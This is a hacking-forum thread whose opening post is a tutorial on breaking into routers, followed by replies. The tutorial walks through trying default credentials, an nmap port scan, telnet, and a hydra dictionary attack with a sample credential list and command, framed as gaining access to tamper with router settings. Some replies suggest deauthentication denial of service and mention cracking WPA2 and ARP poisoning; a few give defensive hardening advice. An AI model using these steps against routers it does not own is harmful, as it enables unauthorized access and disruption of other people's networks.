iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Router hacking
  • chroniccommand
    Posts: 1,389
    [--------------------------------------------------------]
    Paper/Tutorial name: Router Hacking
    Written by: Chroniccommand
    For: CodeShock
    Difficulty: Easy to Intermediate
    State: Work in progress
    [--------------------------------------------------------]
    Table of Contents
    1..........Credits
    2..........Intro
    3..........Basics of a router
    4..........Insecurities
    5..........Brute-forcing // Dictionary attacks
    6..........More to come??
    [-----------------------------------------------------------]
    Credits
    I(Chroniccommand) have written this paper/tutorial by myself. I thank Vivek for teaching me.
    ------------------------------------------------------------\\
    Intro
    Router hacking can be very useful. You can use it to gain access into a routers settings and fuck around with everything > : ) THIS IS NOT A TUTORIAL FOR CRACKING WEP.
    --------------------------------------------------------------\\
    Basics of a router
    You should all know what a router is. A router forwards data in and out of a network.
    http://upload.wikimedia.org/wikipedia/commons/f/f6/SPOF.png
    The image above shows a router communicating between the computers and server. Common types of routers include:
    #Cisco
    #Linksys
    #SMC
    #Netcomm
    #Belkin
    #Netgear
    #And a lot more
    (Possibly more to come for this section)
    ---------------------------------------------------------\\
    Insecurities
    So, you may be asking yourself, what can I do in the router settings? Well you can do alot of things actually. You can forward ports, deny internet for a specific computer, disable the router etc.. Some insecurities include:
    #Not changing the default password
    #Weak password
    #Mis-configurations
    #SNMP attacks
    #And more...
    Generally you would log into the router by going to the address "192.168.1.1" in your browser, but it may be different. Try going into your terminal and typing "ifconfig" without the quotes. You should see something like this on the wlan0 sections(if your using Wi-Fi)

    wlan0     Link encap:Ethernet  HWaddr 00:24:xx:xx:xx:xx  
              inet addr:192.168.1.5  Bcast:192.168.1.255  Mask:255.255.255.0
              inet6 addr: fe80::224:xxxx:xxxx:xxxx/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1492  Metric:1
              RX packets:17305 errors:0 dropped:0 overruns:0 frame:0
              TX packets:13335 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000 
              RX bytes:19241168 (19.2 MB)  TX bytes:1859804 (1.8 MB)

    I blocked out some stuff with x's btw. See where it says "inet addr"? That is your lan IP. Mine is "192.168.1.5". So the login page should be at "192.168.1.1" From there you can login. You may want to try default passwords first. Try something like "Admin" for the username and "password" for the password. Here is a list of default passwords: http://www.phenoelit-us.org/dpl/dpl.html
    --------------------------------------------------------------------------------------\\
    Brute-force // Dictionary attacks
    So what do we do if we do not have access to the router because we don't know the password? The answer is simple. Brute force it or use a dictionary attack. For this particular section I will be using hydra. For this demo I am running BackTrack4 (Because it comes with all the tools). Lets first do an nmap scan on the router:
    'nmap -sS 192.168.1.1'
    I get this type of input for my router (Keep in mind I purposely opened ports for this demo) 

    PORT     STATE SERVICE
    80/tcp   open  http
    23/tcp   open  ssh
    22/tcp   open  telnet
    5678/tcp open  unknown
    MAC Address: 00:0F:66:9A:71:83 (Cisco-Linksys)

    Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds

    So we see that http, ssh, telnet and an unknown port are open. Now I'm going to try to telnet the router.
    'telnet 192.168.1.1 23'
    I get this output:

    Vyatta login:

    I try the default passwords to the router but they don't work =/ So our next option is a dictionary attack. Make sure you have hydra configured correctly on your machine. So what I'm going to do is make a file with some usernames and passwords in it like so:

    vyatta:password
    vyatta:admin
    admin:password
    admin:admin
    administrator:admin
    administrator:password
    administrator:password1
    admin:password1
    vyatta:vyatta

    This is just a quick list of defaults I got. As you can see the order goes 'username:password' separated with a ':' You may want to download a dictionary file as you will probably have more success. So now hydra comes in. Lets try 'hydra' and see the options. The option '-C' should work here. Lets try this command:
    'hydra -C dictionary 192.168.1.1 23'
    This will try all usernames and passwords in the file 'dictionary'. We get the output as username == vyatta, password == admin. So telnet back to the router and log in with those credentials. Great success :mrgreen: We now have access with help from a dictionary attack *thumbs up*
    STILL WORKING ON THIS SECTION!. Expect it soon.
    ----------------------------------------------------------------------------\\
    More to come??
    This tutorial is still a work in progress, I will have more techniques like using Netcat to login to a router and maybe gain root ;). I will also be adding sections for SNMP attacks etc.. If anybody has any suggestions please shout out.
  • Xin
    Posts: 3,251
    Great tutorial, i guess 50% of router passwords are blank!
    Xin
  • Bursihido
    Posts: 406
    very nice tut thank you.................
  • GameOver
    Posts: 675
    I see all your posts.. and it is exchellent! You deserve + rep!

    Good work again!
  • yahiashowgan
    Posts: 22
    Cool!
    Thanks :)
  • tarunagg888
    Posts: 21
    i used to use nmap...!!
    now i'm learning some coding lang's..!!
  • mandi
    Posts: 207
    hmmm what about adding some tutorials based different types of routers attacks?

    like "hit and run attacks",i don't remember all the types i had seen those advanced topics on a e-book from CEH,if possible download CEH v6 e-books and go to "router hacking module" and see the types of attacks on it,And write tutorials for them,because they cover some of the advanced ways of "attacking routers"


    just a suggestion tough,if possible consider it...
    It will be worth to spend your time too :)
  • Fourhman
    Posts: 5
    You can also try deauthing everyone on that particular network to DoS instead of locking them out, because that actually requires access.
  • George
    Posts: 707
    Nice tutorial there, thanks for sharing this.

    Someone should write a guide about router protection / security.. I have a NETGEAR wireless router, I've changed the password from the default "password", and I've added a WEP key, nevertheless, I don't know much about security of routers.
  • Sh3llc0d3
    Posts: 1,910
    said:


    Nice tutorial there, thanks for sharing this.

    Someone should write a guide about router protection / security.. I have a NETGEAR wireless router, I've changed the password from the default "password", and I've added a WEP key, nevertheless, I don't know much about security of routers.



    For Max. security:
    - upgrade to WPA or WPA2 encryption. Most people will give up if they know it's either of these encryptions, it takes too long to crack.
    - Make a note of the MAC addresses on the network and "filter the MAC addresses" so only they can connect.
    - Apart from that if your running a large network it might be worthwhile running a program such as ARPwatch (for linux) which notifies you/blocks attempts when your ARP cache gets altered. Preventing ARP poisoning/Sniffing/MITM.
    - Keep a general eye out (if you don't filter MAC addresses) for extra MAC addresses in the router page/device list that doesn't match any you recognise... if you need to know what mac address go with which computers a quick NMAP scan will tell you. This will let you know if anyones connecting to your router.
  • Fourhman
    Posts: 5
    I agree with Semtex.
    WPA2-PSK is crackable now, not too hard.
    My earlier post kind of hinted at it.
    It's just a new process, and a little packet sniffing, a one replay.
    Not too hard.
    as for ARP, ARP poisioning wins. just sayin'
  • McKittrick
    Posts: 194
    something you can do to harden all routers--especially from the border end of a network---is to set INGRESS and EGRESS filtering. that is why so many kiddie DoS attacks still work today, because the edge routers will look at a packet destination or source and, without these measures in place, will blindly deliver them anywhere! as far as switch protection, one could use static mapping of ARP tables and port security, instead of relying on dynamic tables. just my 2 cents
Add a Comment